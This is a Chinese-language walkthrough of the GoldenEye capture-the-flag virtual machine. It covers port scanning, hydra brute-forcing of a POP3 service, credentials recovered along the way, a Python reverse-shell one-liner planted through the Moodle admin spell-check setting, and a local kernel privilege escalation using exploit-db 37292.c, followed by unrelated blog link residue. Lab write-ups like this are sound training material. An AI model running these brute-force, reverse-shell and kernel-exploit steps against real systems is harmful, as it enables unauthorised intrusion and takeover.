GoldenEye
靶机准备
将靶机ova文件导入虚拟机,并将网络模式设置为NAT

先进行ip扫描
netdiscover -r 192.168.164.0/24

kali:192.168.164.137
渗透测试
扫描端口
nmap -sS -sV -T5 -A -p- 192.168.164.189

开放了4个端口
访问80端口

给了一个路径,访问

需要登录
访问源码,发现js文件,查看源码,里面有线索


尝试解密

boris/InvincibleHack3r
尝试登录

到这再查看源码,找不到其他的东西,先放一放,刚刚扫描还发现55006,55007开放,扫一下是什么服务,
nmap -Pn -p 55006,55007 -sV 192.168.164.189

是pop,尝试连接
nc 192.168.164.189 55007

失败,在源码最后发现另一个账户:Natalya

将用户保存到文本,尝试爆破

hydra -L 2.txt -P /usr/share/wordlists/fasttrack.txxt pop3://192.168.164.189 -s 55007



共得到三个
Natalya/bird
boris/secret1!
Boris/secret1!
尝试boris/secret1!登录,没有发现有用的信息

尝试Natalya/bird登录

发现另一个用户信息,并修改Host文件severnaya-station.com进行访问。
username: xenia
password: RCP90rulez!

成功登录

经过几番查找,又发现一个账户:doak,继续爆破

获得doak的密码
doak/goat
连接pop3,又发现一个用户信息

username: dr_doak
password: 4England!
在网站登录此用户,寻找信息
找到一个文本文件,下载查看

并且发现一个admin用户

并在下载的文件中发现一个照片的路径

尝试访问

下载下来分析
在属看见一串base64编码,尝试解码,


xWinter1995x!
刚刚有个admin用户,猜测是他的密码,网站尝试登录
成功登录

getshell
使用了管理员admin用户登录页面,可以进行网站管理,在页面中找到了Site administration-Server- System paths
可以上传代码使用Python代码,进行反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.164.137",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

本地开启端口1234
将Spell engine改为PSpellShell


拿到shell

不是root权限尝试提权
提权
查看内核
uname -a

searchsploit查找linux内核漏洞
searchsploit 3.13

漏洞进行利用
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root

ssh上传
开启:/etc/init.d/ssh start
scp root@192.168.56.129:/root/1.c /tmp/


对c文件进行编译,有gcc,cc,cang,文件默认是gcc
靶机gcc未编译好,不能用gcc,只能用cc编译,需要修改37292.c编译

修改重新上传

用cc编译,赋予可执行权限后,运行exp

得到root权限,在root目录下找到flag

GoldenEye的更多相关文章
- Goldeneye.py网站压力测试工具2.1版源码
Goldeneye压力测试工具的源代码,粗略看了下,代码写的蛮规范和易读的,打算边读边加上了中文注释,但是想来也没太大必要,代码600多行,值得学习的地方还是蛮多的,喜欢Python的同学可以一读 这 ...
- 阿里 Goldeneye 四个环节落地智能监控:预测、检测、报警及定位
阿里 Goldeneye 四个环节落地智能监控:预测.检测.报警及定位 https://www.infoq.cn/article/alibaba-goldeneye-four-links
- GoldenEye靶机work_through暨CVE-2013-3630复现
前言 备考OSCP,所以接下来会做一系列的OSCP向靶机来练手 靶机描述 I recently got done creating an OSCP type vulnerable machine th ...
- 【原创】项目一GoldenEye
实战流程 1,通过nmap查找本段IP中存活的机器 ┌──(root㉿whoami)-[/home/whoami/Desktop] └─# nmap -sP 192.168.186.0/24 排查网关 ...
- Goldeneye 靶机过关记录
注:因记录时间不同,记录中1.111和1.105均为靶机地址. 1信息收集 1.1得到目标,相关界面如下: 1.2简单信息收集 wappalyzer插件显示: web服务器:Apache 2.4.7 ...
- Spark机器学习读书笔记-CH03
3.1.获取数据: wget http://files.grouplens.org/datasets/movielens/ml-100k.zip 3.2.探索与可视化数据: In [3]: user_ ...
- HackPorts – Mac OS X 渗透测试框架与工具
HackPorts是一个OS X 下的一个渗透框架. HackPorts是一个“超级工程”,充分利用现有的代码移植工作,安全专业人员现在可以使用数以百计的渗透工具在Mac系统中,而不需要虚拟机. 工具 ...
- linux 后台运行程序
有些时候,我们需要在终端启动一个程序,并使之运行--但是如果关闭终端,那么这个程序也就随着关闭了.那么有没有什么方法在关闭终端后,让已经从这个终端启动的程序继续运行呢? 前置知识: xterm,con ...
- Azure上Linux VM DDOS攻击预防: 慢速攻击
在上篇博客(http://www.cnblogs.com/cloudapps/p/4996046.html)中,介绍了如何使用Apache的模块mod_evasive进行反DDOS攻击的设置,在这种模 ...
随机推荐
- 12、Linux基础--挂载磁盘步骤、流处理工具awk(正则 比较 逻辑 算数表达式 流程控制)
笔记 1.晨考 1.用两种方法,实现将文件中的以# 开头的行把# 去掉 sed -r 's/^#//g' /etc/fstab cat /etc/fstab | tr -d '^#' 2.将文件中的H ...
- 关于IDA无法从symbol server下载pdb的问题
在ida目录下,symsrv.dll同目录下创建一个symsrv.yes文件. symsrv.yes将可下载: symsrv.no将失败: 没有相关文件将会弹出授权询问,选择yes和no将创建对应文件 ...
- 面试突击25:sleep和wait有什么区别
sleep 方法和 wait 方法都是用来将线程进入休眠状态的,并且 sleep 和 wait 方法都可以响应 interrupt 中断,也就是线程在休眠的过程中,如果收到中断信号,都可以进行响应,并 ...
- Hbuilderx换行问题(属性合并一行展示)
1. 标签折行,非吾所愿(格式化代码快捷键:Ctrl + K) 2. 打开工具-设置 3. 点击左侧插件配置,点击右边下侧jsbeautify 4. 将原本的折行长度由120改为1200(长度可根据 ...
- flask 中使用蓝图将路由分开写在不同文件
flask 若想将不同的路由写在不同的文件中(如将 user 对象的相关接口写在一个文件中,将 customer 对象的相关接口写在另一个文件中),可以使用蓝图来实现. 有关蓝图的定义:A Bluep ...
- 过分简单,Tabluea仪表板与Smartbi自助仪表盘制作流程分享
上一章节介绍了如何接入数据到系统里面,并且对数据进行处理.那本章节与大家分享Smartbi及Tabluea是如何对数据进行仪表盘制作. 这就是Tabluea的工作簿界面,这也是Tabluea可 ...
- weblogic补丁安装失败
转至:https://www.cnblogs.com/lsdb/p/7234989.html weblogic补丁安装失败(Patch B25A is mutually exclusive and c ...
- Linux系统LVM逻辑卷创建过程以及自动化脚本
转至:https://cloud.tencent.com/developer/article/1068328 Linux系统LVM逻辑卷创建过程以及自动化脚本 2018-03-21阅读 6300 ...
- 安装java环境与eclipse
一.今天安装了java环境和eclipse 二.大道至简学了前三章(前两章)问题不大还好理解 第三章有些东西很懵 1.进入网址www.oracle.com,点击resource(资源) 点击softw ...
- IntelliJ:自动生成JavaBean的读写方法
1.定义好一个class,其中写好private属性. 2.右键点击该class,在generate中选择自动根据模板生成的读写方法.